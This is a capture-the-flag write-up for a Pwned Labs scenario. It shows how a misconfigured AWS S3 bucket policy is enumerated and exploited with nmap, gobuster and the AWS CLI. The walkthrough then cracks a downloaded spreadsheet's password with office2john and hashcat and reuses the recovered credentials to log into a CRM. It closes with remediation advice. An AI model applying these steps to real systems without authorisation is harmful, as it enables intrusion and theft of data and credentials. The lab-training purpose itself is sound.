Exploiting Weak S3 Bucket Policies

A walkthrough demonstrating how weak S3 Bucket policies can lead to system compromise, data exposure and exfiltration.

CTF Source: Pwned Labs

YouTube Walkthrough

Overview

In this walkthrough, we're tasked with accessing sensitive data and demonstrating the extent of impact using an IP address and some AWS Access Keys discovered on a previous engagement.

Pre-Requisites

Install awscli: brew install awscli (mac) apt install awscli (linux)

Install nmap: brew install nmap (mac) apt install nmap (linux)

Install gobuster: brew install gobuster (mac) apt install gobuster (linux)

Install hashcat: brew install hashcat (mac) apt install hashcat (linux)

Install JohnTheRipper: brew install john (mac) apt install john (linux)
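
If you want to confirm each tool is installed and on your PATH before starting, most of them can print a version (john's version output differs between packages, so it's left out here):

aws --version
nmap --version
gobuster version
hashcat --version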

Walkthrough

To start, we’re given an IP address of 13.43.144.61 and some AWS access keys for the user test.

Nmap Enumeration

After configuring our AWS access keys (⁠aws configure⁠), let’s run some nmap scans and see what we’re dealing with.
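
A minimal sketch of that key setup, using placeholder values in place of the real access keys and an example region; aws sts get-caller-identity then confirms the keys are valid and shows which principal they belong to:

# Placeholder values - substitute the keys recovered from the previous engagement
aws configure set aws_access_key_id AKIAXXXXXXXXXXXXXXXX
aws configure set aws_secret_access_key xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
aws configure set region us-east-1   # example region; adjust as needed

# Confirm the keys work and see which identity they map to
aws sts get-caller-identity

With the credentials configured, the first scan below checks which ports are reachable.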

nmap -Pn 13.43.144.61

Host is up (0.12s latency).
Not shown: 925 filtered tcp ports (no-response), 74 closed tcp ports (conn-refused)
PORT     STATE SERVICE
3000/tcp open  ppp

Nmap done: 1 IP address (1 host up) scanned in 635.16 seconds

Only port 3000 is open, so let’s run a service and default-script scan against it.

nmap -Pn -p3000 -sC -sV 13.43.144.61

PORT     STATE SERVICE VERSION
3000/tcp open  http    Node.js Express framework
|_http-title: Huge Logistics > Home
|_http-cors: HEAD GET POST PUT DELETE PATCH

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 17.42 seconds

Alright so looks like we’re dealing with a website on port ⁠3000⁠.

Gobuster Enumeration

Before we view the web page in the browser, let’s kick off a gobuster scan.

Gobuster will iterate through our wordlist and attempt to find other directories that may exist. The -b 404 flag excludes responses that return a 404 status code, i.e. paths that don’t exist.

gobuster fuzz -u http://13.43.144.61:3000/FUZZ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -b 404

Let’s let this run and come back to it later.

Website Enumeration

We can view the site in our browser but it looks like a pretty standard website.

Looking at the source code, though, we find an S3 bucket endpoint!
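
If you'd rather hunt for it from the terminal, a quick sketch is to fetch the page and grep for amazonaws.com URLs (the exact pattern in the HTML may differ):

# Pull the page source and extract any AWS/S3 URLs referenced in it
curl -s http://13.43.144.61:3000/ | grep -oE 'https?://[^" ]+amazonaws\.com[^" ]*' | sort -u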

S3 Bucket Enumeration

It doesn’t appear we can see the data from the browser.

Let’s try the AWS CLI instead. Both of these commands fail, since listing the bucket isn’t permitted.

aws s3 ls s3://hugelogistics-data 
aws s3 ls s3://hugelogistics-data --no-sign-request

But the command to retrieve the bucket policy works!

aws s3api get-bucket-policy --bucket hugelogistics-data | jq -r .Policy | jq .

{
  "Version": "2012-10-17",                                                         
  "Statement": [                                                                   
    {                                                                              
      "Sid": "PublicReadForAuthenticatedUsersForObject",                           
      "Effect": "Allow",                                                           
      "Principal": {                                                               
        "AWS": "*"                                                                 
      },                                                                           
      "Action": [                                                                  
        "s3:GetObject",                                                            
        "s3:GetObjectAcl"                                                          
      ],                                                                           
      "Resource": [                                                                
        "arn:aws:s3:::hugelogistics-data/backup.xlsx",                             
        "arn:aws:s3:::hugelogistics-data/background.png"                           
      ]                                                                            
    },                                                                             
    {                                                                              
      "Sid": "AllowGetBucketPolicy",                                               
      "Effect": "Allow",                                                           
      "Principal": {                                                               
        "AWS": "*"                                                                 
      },                                                                           
      "Action": "s3:GetBucketPolicy",                                              
      "Resource": "arn:aws:s3:::hugelogistics-data"                                
    }                                                                              
  ]                                                                                
}   

Check that out! Let’s copy that backup.xlsx file locally, since we have permission to do so (s3:GetObject).

aws s3 cp s3://hugelogistics-data/backup.xlsx .

download: s3://hugelogistics-data/backup.xlsx to ./backup.xlsx 

If we try to open the file we’ll see it’s password protected.
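
A quick way to confirm this from the terminal is the file utility; an encrypted workbook is typically reported as a CDFV2/Composite Document container rather than a plain OOXML zip (exact wording varies by file version):

file backup.xlsx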

Cracking the Password with Hashcat

Let’s attempt to crack the password on this ⁠xlsx⁠ file.

Since I’m on Kali Linux, I’m going to run a tool called office2john because this is a Microsoft Office file.

You can find the full toolset here.

office2john ./backup.xlsx > hash_backup.xlsx.txt       
cat hash_backup.xlsx.txt

backup.xlsx:$office$*2013*100000*256*16*5e8372cf384ae36827c769ef177230fc*c7367d060cc4cab8d01d887a992fbe2b*a997b2bfbbf996e1b76b1d4f070dc9214db97c19411eb1fe0ef9f5ff49b01904

Now we have a hash of the file and it looks like it’s an Office 2013 file.

Next, we will use a tool called ⁠hashcat⁠ and attempt to crack the file password.

First, we need to determine the hash type (mode) to use. We can do this like so: hashcat --help | grep Office
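
The relevant entry in the output maps mode 9600 to MS Office 2013; the line looks roughly like this (column spacing varies between hashcat versions):

9600 | MS Office 2013 | Documents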

So our hash type is ⁠9600⁠.

Now let’s verify the hash is in the correct format.

We can refer to hashcat’s documentation and look for an example of an Office 2013 hash.

If we compare this to the hash generated by office2john, we see we need to modify our hash and remove the backup.xlsx: filename prefix.
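
A one-liner that strips that filename prefix in place (assuming the hash sits on a single line of hash_backup.xlsx.txt):

sed -i 's/^backup\.xlsx://' hash_backup.xlsx.txt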

Let’s run the cracking with a popular wordlist, ⁠rockyou⁠.

hashcat -a 0 -m 9600 hash_backup.xlsx.txt rockyou.txt

We cracked the password!

Side note, if you rerun this command, it won’t return the password.

This is because it was already cracked and is stored in the file located here ⁠~/.local/share/hashcat/hashcat.potfile⁠.
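
To print an already-cracked password again, re-run hashcat against the same hash file with the --show flag, which reads from the potfile instead of cracking:

hashcat -m 9600 hash_backup.xlsx.txt --show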

Now we can open the xlsx file with the cracked password, and inside we find a ton of credentials to several systems!

Gaining Access to the Website

Remember the ⁠gobuster⁠ scan we ran earlier? Let’s check on how that’s going.

Looks like we successfully found some more directories!

If we navigate to the page ⁠http://13.43.144.61:3000/crm⁠ we’re met with a login page.

Let’s try the credentials from our file for the ⁠WebCRM⁠ system to see if they work.

We’re in!

Exfiltrating Data and Finding the Flag!

Poking around, we can find some Invoice data. We’ll download that since there isn’t much else to do.

Opening this up we find the Flag!

Wrap Up

In this scenario, we were tasked with accessing sensitive data with AWS credentials discovered in a previous engagement. After enumerating our access to an S3 bucket we found a password-protected file. After cracking this file, it revealed credentials to several systems. Using these credentials, we gained access to the CRM platform and obtained access to sensitive data. Here are some recommended actions administrators can take to prevent this from happening.

  1. Tighten the S3 Bucket Policy

    • “Everyone” could perform the following actions (see the example policy sketch after this list):

      • ⁠s3:GetBucketPolicy

        • Not needed by everyone, restrict to admins

      • ⁠s3:GetObject

        • Okay for a website but non-website data was also stored in this bucket (see #2)

      • ⁠s3:GetObjectAcl

        • Not needed by everyone, restrict to admins

  2. Eliminate S3 bucket multi-use

    • Using an S3 bucket for multiple purposes can lead to unintended consequences like information disclosure due to a lax or complicated bucket policy.

    • Since this bucket is hosting a publicly accessible website, only store files relevant to the website.

  3. Ensure employees are trained and have access to a credential manager

    • In this case, a spreadsheet was found containing login credentials to several systems.

    • Securely store credentials in solutions such as Bitwarden, 1Password, AWS Secrets Manager, HashiCorp Vault, or similar.

  4. Secure login to CRM system

    • Protect access to the CRM system by removing (or restricting) public access, restricting login behind SSO, and requiring MFA.
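
As a minimal sketch of recommendation #1, the public statements could be collapsed into a single s3:GetObject grant scoped to website assets only (the object key below is the one from the original policy; applying this requires a principal allowed to call s3:PutBucketPolicy):

# Write a tightened policy that only exposes the public website asset
cat > tightened-policy.json <<'EOF'
{
  "Version": "2012-10-17",
  "Statement": [
    {
      "Sid": "PublicReadForWebsiteAssetsOnly",
      "Effect": "Allow",
      "Principal": "*",
      "Action": "s3:GetObject",
      "Resource": "arn:aws:s3:::hugelogistics-data/background.png"
    }
  ]
}
EOF

# Apply it to the bucket (requires s3:PutBucketPolicy on an admin principal)
aws s3api put-bucket-policy --bucket hugelogistics-data --policy file://tightened-policy.json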

Last updated